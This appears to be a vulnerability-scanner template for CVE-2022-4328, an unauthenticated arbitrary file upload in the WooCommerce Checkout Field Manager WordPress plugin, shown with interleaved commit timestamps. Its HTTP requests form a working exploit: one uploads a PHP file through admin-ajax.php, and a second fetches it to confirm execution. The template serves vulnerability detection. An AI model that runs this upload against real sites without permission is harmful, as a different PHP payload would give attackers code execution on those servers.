2023-05-06 12:12:20 +00:00
id : CVE-2022-4328
info :
name : WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
author : theamanrawat
severity : critical
description : |
The WooCommerce Checkout Field Manager WordPress plugin before 18.0 does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server.
2023-09-06 11:59:08 +00:00
remediation : Fixed in version 18.0
2023-05-06 12:12:20 +00:00
reference :
- https://wpscan.com/vulnerability/4dc72cd2-81d7-4a66-86bd-c9cfaf690eed
- https://wordpress.org/plugins/n-media-woocommerce-checkout-fields/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4328
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-4328
cwe-id : CWE-434
2024-01-14 13:49:27 +00:00
epss-score : 0.22681
epss-percentile : 0.96077
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:najeebmedia:woocommerce_checkout_field_manager:*:*:*:*:*:wordpress:*:*
2023-05-06 12:12:20 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : najeebmedia
product : woocommerce_checkout_field_manager
2023-09-06 11:59:08 +00:00
framework : wordpress
2024-04-15 11:26:37 +00:00
tags : cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload
variables :
string : "CVE-2022-4328"
2023-05-06 12:12:20 +00:00
http :
- raw :
- |
POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=------------------------22728be7b3104597
--------------------------22728be7b3104597
Content-Disposition : form-data; name="file"; filename="{{randstr}}.php"
Content-Type : application/octet-stream
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2023-05-06 12:12:20 +00:00
--------------------------22728be7b3104597--
- |
GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2024-04-15 11:26:37 +00:00
part : body_2
2023-05-06 12:12:20 +00:00
words :
2024-04-15 11:26:37 +00:00
- '{{md5(string)}}'
2024-04-23 10:06:08 +00:00
# digest: 4b0a00483046022100db4a0f639753de0386e0d6f256fdf6e31797f887c3f67051f67f03ff12021437022100e2072c64127d9242a4900aa37c32949d284a94fa2f241e66d10828e56cf2acbd:922c64590222798bb761d5b6d8e72950